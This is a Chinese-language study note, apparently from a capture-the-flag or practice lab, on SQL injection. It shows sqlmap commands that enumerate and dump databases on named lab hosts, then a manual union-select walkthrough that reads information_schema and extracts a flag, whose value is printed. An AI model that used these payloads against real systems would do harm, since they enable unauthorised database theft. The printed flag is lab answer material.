简单绕过笔记
sql工具注入
要用到什么工具? sqlmap
1.交互点 http://mashang.eicp.vip:1651/TopicTmp/eZPa1Pw7Gt4z6JvalF5xFyWJCvkN2h0f/?id=2
2.判断类型
漏洞利用
python sqlmap.py -u"http://rhiq8003.ia.aqlab.cn/?id=1" --current-db
maoshe
python sqlmap.py -u"http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe --tables
+++++++python sqlmap.py -u"http://mashang.eicp.vip:1651/TopicTmp/dNTtlXaIbBtZWJKe8V1VeLSjdQKtD5tK/?id=1" --current-db
python sqlmap.py -u "http://mashang.eicp.vip:1651/TopicTmp/eZPa1Pw7Gt4z6JvalF5xFyWJCvkN2h0f/?id=2" --current-db
--current-db //列出当前网站数据库名称 message
python sqlmap.py -u "http://mashang.eicp.vip:1651/TopicTmp/eZPa1Pw7Gt4z6JvalF5xFyWJCvkN2h0f/?id=2" -D message --tables
-D 当前网站数据库名称
--tables 列出当前数据库的数据表名称
++++++python sqlmap.py -u"http://mashang.eicp.vip:1651/TopicTmp/dNTtlXaIbBtZWJKe8V1VeLSjdQKtD5tK/?id=1" -D message --tables
数据表的名字 flag user username
python sqlmap.py -u "http://mashang.eicp.vip:1651/TopicTmp/eZPa1Pw7Gt4z6JvalF5xFyWJCvkN2h0f/?id=2" -D message -T flag -C flag --dump
python sqlmap.py -u"http://mashang.eicp.vip:1651/TopicTmp/dNTtlXaIbBtZWJKe8V1VeLSjdQKtD5tK/?id=1" -D message -T flag -C flag --dump
-T 当前数据库下面数据表的名称
--columns 列出当前数据库的数据表下面的数据列
flag{a1a8887793acfc199182a649e905daab} MD5加密
====================================================
sql手工注入
1.找交互点 url
2.找注入点 '
3.判断注入类型
1 and 1=1 1 and 1=2
看回显结果,如果回显结果一样,说明他是字符型,如果回显结果不一样,就是整型
字符型
' 闭合 注释符# --+
4.判断列数 order by 二分法 3列
1' order by 1--+
id='1' order by 1--+'
5.看回显位置 union select 联合查询
1' and 1=2 union select 1,2,3--+
6.查询数据库名称 message
1' and 1=2 union select 1,database(),3--+
7.查询数据表名称 flag,user,username
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='message'--+
8.查询数据列名称 flag,id
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'--+
9.读取数据
1' and 1=2 union select 1,id,3 from flag--+
flag{a1a8887793acfc199182a649e905daab}

浙公网安备 33010602011771号